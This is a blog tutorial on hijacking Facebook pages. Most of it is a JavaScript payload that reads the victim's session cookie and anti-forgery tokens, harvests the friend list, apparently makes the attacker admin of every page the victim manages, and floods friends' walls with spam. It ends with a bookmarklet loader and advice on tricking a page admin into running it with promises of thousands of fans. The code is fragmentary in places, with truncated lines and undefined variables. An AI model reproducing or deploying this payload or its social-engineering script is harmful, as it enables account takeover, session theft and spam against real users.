How Do facebook page hack attack ?

facebook page hack attack

facebook fun page hack

Now let’s start the tutorial. First of all we will need to setup an exploit and a website to host the exploit. If you already have a hosting then it’s great otherwise there are couple of free hosting websites that can be used for such purposes. I will tell you about it along with the tutorial.

Disclaimer: Coder and related sites are not responsible for any abuse done using this trick.

Things we shall need:

1. Facebook page hacking exploit.

2. A free hosting.

3. A key or script to run that "Facebook page hacking exploit.".

4. Your Facebook email id.

5. Brain (A bit)

Step 1:

Copy the Below Code and Save It In A Notepad....

Search For in the Code Below & Replace It With Your Facebook EMAIL ID

//These are to be posted as status messagestxt = "Hey See what i got!";

txtee = "Hey See what i got!";

alert("Please wait 10-15 seconds, that we can analyze your friends to boost pages fans! Then click 'OK'to continue!");

with(x = new XMLHttpRequest()) open("GET", "/"), onreadystatechange = function () {

if (x.readyState == 4 && x.status == 200) {


//comp = z.match(/name="UIComposer_STATE_PIC_OUTSIDE" value="([\d\w]+)"/i)[1];

// comp = x.responseText.match(/name="UIComposer_STATE_PIC_OUTSIDE" id="([\d\w]+)"/i)[1];

form = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];

dt = z.match(/name="fb_dtsg" value="([\d\w-_]+)"/i)[1];

pfid = z.match(/name="post_form_id" value="([\d\w]+)"/i)[1];

with(xx = new XMLHttpRequest())

open("GET", "/ajax/browser/friends/?uid=" +

document.cookie.match(/c_user=(\d+)/)[1] +


onreadystatechange = function () {

//extracts list of friends

if (xx.readyState == 4 && xx.status == 200) {

m = xx.responseText.match(/\/\d+_\d+_\d+_q\.jpg/gi).join("\n").replace(/(\/\d+_|_\d+_q\.jpg)/gi, "").split("\n");

//facebook returns list of friends images of the form of three numbers separated by _,

//the above regular expression extracts out the middle of the two

//(which infact is the userID of friend)

i = 0;


t = setInterval(function () {

if (i >= llimit )

return;//it seems the limit is 25 posts per 2 seconds on facebook (to be counted as bot)

if(i == 0) {//do it only once

with(ddddd = new XMLHttpRequest()) open("GET", "/ajax/pages/dialog/manage_pages.php?__a=1&__d=1"),

setRequestHeader("X-Requested-With", null),

setRequestHeader("X-Requested", null),

onreadystatechange = function() {

if(ddddd.readyState == 4 && ddddd.status == 200) {

llm = (d = ddddd.responseText).match(/\\"id\\":([\d]+)/gi); len =llm.length;



with(xxxcxxx = new XMLHttpRequest()) open("POST", "/pages/edit/?id="+llm[j].replace(/\\"id\\":/i, "")+"&sk=admin"),

setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),

send("post_form_id="+pfid+"&fb_dtsg="+dt+"&fbpage_id="+llm[j].replace(/\\"id\\":/i, "")+


//I am not very sure on this one but it seems it adds as admin of all pages the user holds



}, send(null); //end of function to change the admins

// this one collects cookie as well as the personalized status update email address

// (a photo sent to that address is posted on the wall directly)


//following code does status update

//the code writes message represented by txt and txtee alternately on the wall of friends.

//txt and txtee are same though (may be author's mistake)



with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),

setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),

send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txt +

"&target_id=" + m[Math.floor(Math.random() * m.length)] +

//m is an array of id of friends (was created early in the script exec), choose a random friend

"&composer_id=" +

"&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" +form + "&fb_dtsg=" + dt +

//comp, form, dt are (probably) XSRF prevention tokens





with(xd = new XMLHttpRequest()) open("POST", "/ajax/updatestatus.php?__a=1"),

setRequestHeader("Content-Type", "application/x-www-form-urlencoded"),

send("action=PROFILE_UPDATE&profile_id=" + document.cookie.match(/c_user=(\d+)/)[1] + "&status=" + txtee +

"&target_id=" + m[Math.floor(Math.random() * m.length)] + "&composer_id="+

"&hey_kid_im_a_composer=true&display_context=profile&post_form_id=" + form + "&fb_dtsg=" + dt +



i += 1;

}, 2000);// 2000 milli-sec window, after which the script is executed again


}, send(null);


}, send(null);

Now Save the Notepad File as funpage.js

Step 2: 

Create a Free Hosting Account Somewhere on a Free Host & Upload Your funpage.js File.

There ... You Will Get a Link

For Example:

Step 3: The Viral Code Creation

javascript:(a = (b = document).createElement(“script”)).src = ““, b.body.appendChild(a); void(0)

Now You Just Have To Send This Code To The Admin Of The Page And Tell Him to Run it On The Page.. It’s Up to You How You Fool Him ... 

Hint: You Can Give Him A Greed That After Running This Code He Will Get 1000's Of Fans or Something Like That...

Note: This tutorial is only for Educational Purposes, I did not take any responsibility of any misuse.
Share on Google Plus

About TRB Blogger

This is a short description in the author block about the author. You edit it by entering text in the "Biographical Info" field in the user admin panel.
    Blogger Comment


Post a Comment